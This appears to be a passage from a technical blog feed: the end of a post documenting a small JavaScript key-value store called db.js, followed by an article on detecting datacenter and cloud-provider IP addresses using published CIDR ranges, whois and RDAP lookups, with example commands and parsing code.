<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a value'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'ok'</span> <span class="p">})</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/get'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a key'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="nx">key</span><span class="p">))</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/get_all'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">_getn</span><span class="p">(</span><span class="mf">100000</span><span class="p">),</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">))</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/insert_random'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">num</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide the number of random values to insert with the key `num`'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">num</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">num</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">num</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="nx">randomString</span><span class="p">(</span><span class="mf">5</span><span class="p">),</span> <span class="nx">randomString</span><span class="p">(</span><span class="mf">30</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'ok'</span> <span class="p">})</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example db.js app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">})</span>
</code></pre></div>
<h1>db.js API</h1>
<p>The db.js API currently has five main API methods:</p>
<h4>set(key, value)</h4>
<p><code>set(key, value)</code> - Assigns the <code>value</code> to the <code>key</code> in the storage. If the <code>key</code> is already in the database, its value is overwritten. Keys are unique.</p>
<h4>get(key)</h4>
<p><code>get(key)</code> - Returns the <code>value</code> associated with <code>key</code> from the storage. The lookup time is <code>O(1)</code>.</p>
<h4>getn(index_range, time_range)</h4>
<p><code>getn(index_range, time_range)</code> - Returns an array of values in reverse insertion order. This means that the most recently inserted value (inserted with <code>set(key, value)</code>) is returned as the first element of the array. When both <code>index_range</code> and <code>time_range</code> are <code>null</code>, <code>getn()</code> returns the contents of the memory cache by default.</p>
<p>The variable <code>index_range</code> selects values to be returned by index range. If you specify <code>index_range=[0, 500]</code>, then the last 500 inserted values are returned.</p>
<p>The variable <code>time_range</code> selects values to be returned by a timestamp range. If you specify <code>time_range=[1649418657952, 1649418675192]</code>, then the items that were inserted between those two timestamps will be returned.</p>
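<p>To make the semantics of <code>getn()</code> more concrete, here is a toy in-memory model. It is not the db.js implementation: the class name <code>ToyStore</code>, the injectable clock, the half-open reading of <code>index_range</code>, the inclusive reading of <code>time_range</code> and the behaviour on overwrite are all assumptions made for illustration. Unlike db.js, it has no separate memory cache, so calling <code>getn()</code> without arguments simply returns everything.</p>

```javascript
// Toy model of the documented set/get/getn behaviour (NOT the real db.js code).
class ToyStore {
  constructor(now = () => Date.now()) {
    this.now = now;          // injectable clock, handy for deterministic demos
    this.index = new Map();  // key -> entry, gives O(1) lookups
    this.log = [];           // entries in insertion order (oldest first)
  }

  set(key, value) {
    const existing = this.index.get(key);
    if (existing) {
      // Keys are unique. Assumption: an overwrite keeps the original position.
      existing.value = value;
      return;
    }
    const entry = { key, value, ts: this.now() };
    this.index.set(key, entry);
    this.log.push(entry);
  }

  get(key) {
    const entry = this.index.get(key);
    return entry ? entry.value : undefined;
  }

  // index_range = [from, to): positions counted from the newest entry (assumption).
  // time_range = [start, end]: inclusive insertion timestamps in ms (assumption).
  getn(index_range = null, time_range = null) {
    let entries = [...this.log].reverse(); // newest first
    if (time_range) {
      const [start, end] = time_range;
      entries = entries.filter((e) => e.ts >= start && e.ts <= end);
    }
    if (index_range) {
      const [from, to] = index_range;
      entries = entries.slice(from, to);
    }
    return entries.map((e) => e.value);
  }
}

let tick = 1000;
const store = new ToyStore(() => tick++);
store.set('a', 'first');
store.set('b', 'second');
store.set('c', 'third');
console.log(store.getn([0, 2]));             // the two most recently inserted values
console.log(store.getn(null, [1000, 1001])); // values inserted at timestamps 1000..1001
```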
<h4>index_size()</h4>
<p><code>index_size()</code> - Returns the index size of the database. This is equivalent to the number of all database entries and thus the size of the database.</p>
<h4>cache_size()</h4>
<p><code>cache_size()</code> - Returns the cache size of the database. The cache includes all database entries that are kept in memory.</p>How to find out if an IP address belongs to a Hosting / Cloud Provider?2022-03-09T17:45:00+01:002022-03-14T14:48:00+01:00Nikolai Tschachertag:incolumitas.com,2022-03-09:/2022/03/09/find-out-if-an-IP-address-belongs-to-a-hosting-provider/<p>It is not entirely trivial to find out if an IP address belongs to a datacenter / cloud provider. In this blog article, I try to find an algorithm that determines with high confidence whether an IPv4 / IPv6 address belongs to a hosting provider or not.</p><p><a class="orange_button" href="https://incolumitas.com/pages/Datacenter-IP-API/">Also check the Datacenter IP address API site</a></p>
<h2>Introduction</h2>
<p>In the field of IT-Security, it is often paramount to find the <em>reputation</em> of an IP address.
The reputation of an IP address is an abstract construct, but it consists of several factors:</p>
<ol>
<li>How trustworthy is the underlying network provider / ISP? Is it known for spam and fraud?</li>
<li>How easy is it for third parties to send traffic in the name of its network? Put differently: Can I purchase hosting services from said provider?</li>
<li>How stringent are the steps to obtain an IP address in a legal sense? For example, in order to obtain a mobile SIM card in many countries of the world, <a href="https://prepaid-data-sim-card.fandom.com/wiki/Registration_Policies_Per_Country">you need to identify yourself with your passport when signing the mobile contract</a>.</li>
<li>Where is the IP address located geographically? There are countries with a higher reputation and countries with a lower reputation.</li>
</ol>
<p>The reputation of an IP address boils down to the question:</p>
<blockquote>
<p>How hard is it for anonymous third parties to obtain IP addresses (preferably in large quantities) from a network without having to undergo a strict identification process (in a legal sense - showing an ID card or passport)?</p>
</blockquote>
<p>Datacenters and cloud providers such as <a href="https://www.digitalocean.com/">DigitalOcean</a>, <a href="https://www.hetzner.com/">Hetzner</a>, <a href="https://www.ovhcloud.com/en/">OVH</a>, <a href="https://aws.amazon.com/">Amazon AWS</a> and <a href="https://azure.microsoft.com/en-us/">Microsoft Azure</a> allow third parties to rent hosting infrastructure and thus give them access to their network. Those data centers make it relatively easy for third-parties to send traffic from their network.</p>
<p>For example, there are many projects that make use of the Amazon AWS infrastructure to proxy traffic through their network. One such example is the <a href="https://github.com/Ge0rg3/requests-ip-rotator">Ge0rg3/requests-ip-rotator</a> library, which allows you to <em>utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.</em></p>
<p>Therefore, if an IP address can be traced to a datacenter / cloud provider, it can be inferred that the resulting traffic is of lower reputation, since it is very easy for any party to rent hosting/network infrastructure in large quantities. In reality, website visitors that come from datacenter IP address ranges are probably bots in around 99% of all cases.</p>
<p>In this blog article, a straightforward technical process is presented that determines whether an IP address belongs to a datacenter or not.</p>
<h2>Sources/Algorithms for checking whether an IP address belongs to a Hosting / Cloud Provider</h2>
<h3>Idea 1: Lookup in Self-Published IP-Ranges from Datacenters</h3>
<p>First, check if the IP can be found in self-published IP ranges (often in CIDR format) from datacenter providers. Not every datacenter provider publishes their IP ranges, and sometimes the published IP ranges are incomplete. But it certainly makes sense to incorporate self-published datacenter IP ranges in the lookup process.</p>
<ol>
<li>Amazon AWS publishes their IP ranges: <a href="https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html">Amazon AWS IP ranges</a></li>
<li>Google Cloud also publishes their IP ranges: <a href="https://www.gstatic.com/ipranges/cloud.json">Google Cloud IP ranges</a></li>
<li>Counterexample: <a href="https://www.hetzner.com/">Hetzner.com</a> does not publish IP ranges!</li>
<li>Counterexample: <a href="https://www.ovhcloud.com/en/">OVH Cloud</a> also doesn't publish IP ranges...</li>
</ol>
<p>This is what those published IP ranges look like (excerpt from <a href="https://www.gstatic.com/ipranges/cloud.json">Google Cloud</a>):</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"syncToken"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1647190988307"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"creationTime"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2022-03-13T10:03:08.30788"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"prefixes"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.185.128.0/19"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.185.160.0/20"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.187.144.0/20"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.189.160.0/19"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ipv4Prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35.201.128.0/17"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Google Cloud"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"asia-east1"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
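<p>Checking an address against such a list comes down to CIDR matching. The following is a minimal sketch for IPv4 only. The helper names <code>ipv4ToInt</code>, <code>inCidr</code> and <code>findPrefix</code> are made up for this example, and IPv6 prefixes are simply skipped.</p>

```javascript
// Convert a dotted-quad IPv4 string into a number between 0 and 2^32 - 1.
function ipv4ToInt(ip) {
  const parts = ip.split('.');
  if (parts.length !== 4 || !parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255)) {
    throw new Error(`invalid IPv4 address: ${ip}`);
  }
  // Plain arithmetic instead of bit shifts avoids signed 32-bit surprises.
  return parts.reduce((acc, p) => acc * 256 + Number(p), 0);
}

// Check whether an IPv4 address lies inside a CIDR prefix such as "35.185.128.0/19".
function inCidr(ip, cidr) {
  const [base, bitsStr] = cidr.split('/');
  const bits = Number(bitsStr);
  if (!Number.isInteger(bits) || bits < 0 || bits > 32) {
    throw new Error(`invalid prefix length: ${cidr}`);
  }
  const size = 2 ** (32 - bits);                          // addresses in the block
  const start = Math.floor(ipv4ToInt(base) / size) * size; // align to block start
  const addr = ipv4ToInt(ip);
  return addr >= start && addr < start + size;
}

// Return the first matching prefix entry, or null if the IP is not listed.
function findPrefix(ip, ranges) {
  return ranges.prefixes.find((p) => p.ipv4Prefix && inCidr(ip, p.ipv4Prefix)) || null;
}

// Two entries taken from the excerpt above.
const ranges = {
  prefixes: [
    { ipv4Prefix: '35.185.128.0/19', service: 'Google Cloud', scope: 'asia-east1' },
    { ipv4Prefix: '35.185.160.0/20', service: 'Google Cloud', scope: 'asia-east1' },
  ],
};

console.log(findPrefix('35.185.130.7', ranges));
console.log(findPrefix('8.8.8.8', ranges));
```

<p>A linear scan is fine for a few thousand prefixes. For larger lists, a sorted array with binary search or a prefix trie would probably be the better choice.</p>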
<p>Obviously, self-published IP ranges are not sufficient, since most datacenters do not publish their complete set of IP ranges. Other sources have to be considered. One obvious source is <code>whois</code> data from Regional Internet Registries (RIRs). The task of RIRs is to:</p>
<blockquote>
<p>Manage the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.</p>
</blockquote>
<h3>Idea 2: Whois/RDAP Lookups</h3>
<p>If an IP address is not found in self-published IP ranges from datacenters, a <a href="https://www.arin.net/resources/registry/whois/">Whois/RDAP lookup</a> of the IP address can be conducted. Example:</p>
<div class="highlight"><pre><span></span><code>whois <span class="m">105</span>.226.177.72 <span class="p">|</span> grep -E -i <span class="s2">"(OrgName:|address:|OrgTechName:|descr:)"</span>
</code></pre></div>
<p>If the name of the organization belongs to a datacenter, we have a match. This is a simple string matching approach.</p>
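<p>The string matching step could be sketched as follows. The keyword list is a hypothetical placeholder that would need to be much longer in practice, and the function name <code>matchDatacenter</code> is an assumption. The field names are the ones from the <code>grep</code> command above, and the sample input reuses whois output shown in this article.</p>

```javascript
// Hypothetical keyword list; a real deployment would need a far larger one.
const DATACENTER_KEYWORDS = ['digitalocean', 'hetzner', 'ovh', 'amazon', 'microsoft azure'];

// Same fields as in the grep command, matched case-insensitively.
const FIELD_PATTERN = /^(OrgName|address|OrgTechName|descr):\s*(.*)$/i;

// Return the first field whose value contains a datacenter keyword, or null.
function matchDatacenter(whoisText) {
  for (const line of whoisText.split('\n')) {
    const m = FIELD_PATTERN.exec(line.trim());
    if (!m) continue;
    const value = m[2].toLowerCase();
    const keyword = DATACENTER_KEYWORDS.find((kw) => value.includes(kw));
    if (keyword) return { field: m[1], value: m[2], keyword };
  }
  return null;
}

const whoisSample = [
  'route: 138.197.176.0/20',
  'origin: AS14061',
  'source: RADB',
  'descr: DigitalOcean',
].join('\n');

console.log(matchDatacenter(whoisSample));
```

<p>Plain substring matching will produce false positives for short keywords, so matching on word boundaries or against a curated list of organization names is probably worth the extra effort.</p>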
<p>Downside: Whois/RDAP lookups do not scale, and each lookup is expensive in terms of time (a TCP/IP connection has to be established). Whois/RDAP servers can and will block a single client after too many requests.</p>
<p>In fact, <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">ripe.net states the following</a>:</p>
<blockquote>
<p>Please note that when searching for resources such as an IP address block or AS Number, contact information from related objects will automatically be returned as well. You can only query for a limited amount of personal information every day. After reaching that limit, you will be blocked from making further queries. To disable automatic queries for personal information, please use the "-r" flag, as explained in the Advanced Queries section.</p>
</blockquote>
<p>Whois lookups can be improved by specifying the whois server manually, which makes it possible to load balance across servers to some extent:</p>
<div class="highlight"><pre><span></span><code>$ whois -h whois.radb.net <span class="m">138</span>.197.186.3
route: <span class="m">138</span>.197.176.0/20
changed: noc@digitalocean.com <span class="m">20180515</span> <span class="c1">#16:51:53Z</span>
member-of: RS-Digitalocean
origin: AS14061
source: RADB
descr: DigitalOcean
mnt-by: MAINT-AS14061
</code></pre></div>
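<p>Responses like the one above are plain <code>key: value</code> lines, so they are easy to turn into a structured record. A small sketch, where the function name <code>parseWhois</code> and the choice to store every attribute as an array are assumptions:</p>

```javascript
// Parse "key: value" lines into { key: [values...] }.
// Comment lines starting with % or # are skipped.
function parseWhois(text) {
  const record = Object.create(null); // no prototype, so any key name is safe
  for (const line of text.split('\n')) {
    if (line.startsWith('%') || line.startsWith('#')) continue;
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    const key = line.slice(0, idx).trim();
    const value = line.slice(idx + 1).trim();
    if (!key) continue;
    (record[key] = record[key] || []).push(value);
  }
  return record;
}

// The RADB response shown above.
const radbOutput = [
  'route: 138.197.176.0/20',
  'changed: noc@digitalocean.com 20180515 #16:51:53Z',
  'member-of: RS-Digitalocean',
  'origin: AS14061',
  'source: RADB',
  'descr: DigitalOcean',
  'mnt-by: MAINT-AS14061',
].join('\n');

const radbRecord = parseWhois(radbOutput);
console.log(radbRecord.route[0], radbRecord.origin[0], radbRecord.descr[0]);
```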
<p>You can also make direct RDAP queries:</p>
<div class="highlight"><pre><span></span><code>curl https://rdap.arin.net/registry/ip/18.236.125.255
<span class="c1"># snip</span>
<span class="s2">"handle"</span> : <span class="s2">"AEA8-ARIN"</span>,
<span class="s2">"vcardArray"</span> : <span class="o">[</span> <span class="s2">"vcard"</span>, <span class="o">[</span> <span class="o">[</span> <span class="s2">"version"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"4.0"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"adr"</span>, <span class="o">{</span>
<span class="s2">"label"</span> : <span class="s2">"Amazon Web Services Elastic Compute Cloud, EC2\n410 Terry Avenue North\nSeattle\nWA\n98109-5210\nUnited States"</span>
<span class="o">}</span>, <span class="s2">"text"</span>, <span class="o">[</span> <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span>, <span class="s2">""</span> <span class="o">]</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"fn"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"Amazon EC2 Abuse"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"org"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"Amazon EC2 Abuse"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"kind"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"group"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"email"</span>, <span class="o">{</span> <span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"abuse@amazonaws.com"</span> <span class="o">]</span>, <span class="o">[</span> <span class="s2">"tel"</span>, <span class="o">{</span>
<span class="s2">"type"</span> : <span class="o">[</span> <span class="s2">"work"</span>, <span class="s2">"voice"</span> <span class="o">]</span>
<span class="o">}</span>, <span class="s2">"text"</span>, <span class="s2">"+1-206-266-4064"</span> <span class="o">]</span> <span class="o">]</span> <span class="o">]</span>,
<span class="s2">"roles"</span> : <span class="o">[</span> <span class="s2">"abuse"</span> <span class="o">]</span>,
<span class="s2">"remarks"</span> : <span class="o">[</span> <span class="o">{</span>
<span class="s2">"title"</span> : <span class="s2">"Registration Comments"</span>,
<span class="c1"># snip</span>
</code></pre></div>
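<p>The contact details in an RDAP response are encoded as jCard arrays, which are awkward to read by eye. The sketch below pulls the display name out of each entity. The function names are made up, and the sample object is a hand-trimmed reconstruction of the snippet above, wrapped in an <code>entities</code> array as RDAP responses normally are.</p>

```javascript
// Pull one property (e.g. "fn" or "email") out of a jCard array.
// A jCard looks like ["vcard", [[name, params, type, value], ...]].
function vcardValue(vcardArray, name) {
  const props = Array.isArray(vcardArray) && Array.isArray(vcardArray[1]) ? vcardArray[1] : [];
  const prop = props.find((p) => p[0] === name);
  return prop ? prop[3] : null;
}

// Collect handle, roles and display name of every entity, including nested ones.
function listEntities(rdap, out = []) {
  for (const entity of rdap.entities || []) {
    out.push({
      handle: entity.handle,
      roles: entity.roles || [],
      name: vcardValue(entity.vcardArray, 'fn'),
    });
    listEntities(entity, out); // entities can contain further entities
  }
  return out;
}

// Trimmed reconstruction of the response fragment shown above.
const rdapSample = {
  entities: [{
    handle: 'AEA8-ARIN',
    vcardArray: ['vcard', [
      ['version', {}, 'text', '4.0'],
      ['fn', {}, 'text', 'Amazon EC2 Abuse'],
      ['email', {}, 'text', 'abuse@amazonaws.com'],
    ]],
    roles: ['abuse'],
  }],
};

console.log(listEntities(rdapSample));
```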
<p>The <a href="https://github.com/RIPE-NCC/whois/wiki/WHOIS-REST-API">RIPE-NCC whois database is documented here</a> and <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation">on www.ripe.net</a>.</p>
<p>There also exists a good tutorial on <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">Querying the RIPE Database</a>.</p>
<p>This is what an API request to the <a href="https://github.com/RIPE-NCC/whois/wiki/WHOIS-REST-API">RIPE-NCC whois database</a> looks like with curl. <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/how-to-query-the-ripe-database/restful-api-queries/api-lookup">Here is an example API lookup</a> which looks up an <a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-4-description-of-the-inetnum-object">inetnum object</a> (API output modified for brevity):</p>
<div class="highlight"><pre><span></span><code>curl -H <span class="s1">'Accept: application/json'</span> <span class="s1">'https://rest.db.ripe.net/ripe/inetnum/193.0.0.0%20-%20193.0.7.255?unfiltered'</span>
<span class="o">{</span>
<span class="s2">"objects"</span>:<span class="o">{</span>
<span class="s2">"object"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"link"</span>:<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"locator"</span>,
<span class="s2">"href"</span>:<span class="s2">"https://rest.db.ripe.net/ripe/inetnum/193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>,
<span class="s2">"source"</span>:<span class="o">{</span>
<span class="s2">"id"</span>:<span class="s2">"ripe"</span>
<span class="o">}</span>,
<span class="s2">"primary-key"</span>:<span class="o">{</span>
<span class="s2">"attribute"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"value"</span>:<span class="s2">"193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="s2">"attributes"</span>:<span class="o">{</span>
<span class="s2">"attribute"</span>:<span class="o">[</span>
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"inetnum"</span>,
<span class="s2">"value"</span>:<span class="s2">"193.0.0.0 - 193.0.7.255"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"netname"</span>,
<span class="s2">"value"</span>:<span class="s2">"RIPE-NCC"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"descr"</span>,
<span class="s2">"value"</span>:<span class="s2">"RIPE Network Coordination Centre"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"link"</span>:<span class="o">{</span>
<span class="s2">"type"</span>:<span class="s2">"locator"</span>,
<span class="s2">"href"</span>:<span class="s2">"https://rest.db.ripe.net/ripe/organisation/ORG-RIEN1-RIPE"</span>
<span class="o">}</span>,
<span class="s2">"name"</span>:<span class="s2">"org"</span>,
<span class="s2">"value"</span>:<span class="s2">"ORG-RIEN1-RIPE"</span>,
<span class="s2">"referenced-type"</span>:<span class="s2">"organisation"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"descr"</span>,
<span class="s2">"value"</span>:<span class="s2">"Amsterdam, Netherlands"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"remarks"</span>,
<span class="s2">"value"</span>:<span class="s2">"Used for RIPE NCC infrastructure."</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"name"</span>:<span class="s2">"country"</span>,
<span class="s2">"value"</span>:<span class="s2">"NL"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
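<p>The attribute list in this response is verbose, so it helps to flatten it before matching on <code>netname</code> or <code>descr</code>. A minimal sketch, where the function name <code>flattenAttributes</code> is an assumption and the sample object is an abridged copy of the response above:</p>

```javascript
// Turn the attribute list of a RIPE REST response into { name: [values...] }.
function flattenAttributes(response) {
  const flat = Object.create(null); // no prototype, so any attribute name is safe
  for (const obj of response.objects.object) {
    for (const attr of obj.attributes.attribute) {
      (flat[attr.name] = flat[attr.name] || []).push(attr.value);
    }
  }
  return flat;
}

// Abridged copy of the inetnum response shown above.
const ripeResponse = {
  objects: {
    object: [{
      type: 'inetnum',
      attributes: {
        attribute: [
          { name: 'inetnum', value: '193.0.0.0 - 193.0.7.255' },
          { name: 'netname', value: 'RIPE-NCC' },
          { name: 'descr', value: 'RIPE Network Coordination Centre' },
          { name: 'org', value: 'ORG-RIEN1-RIPE' },
          { name: 'descr', value: 'Amsterdam, Netherlands' },
          { name: 'country', value: 'NL' },
        ],
      },
    }],
  },
};

const flatAttrs = flattenAttributes(ripeResponse);
console.log(flatAttrs.netname[0], flatAttrs.descr, flatAttrs.country[0]);
```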
<p>You can also look up other whois data objects such as:</p>
<ul>
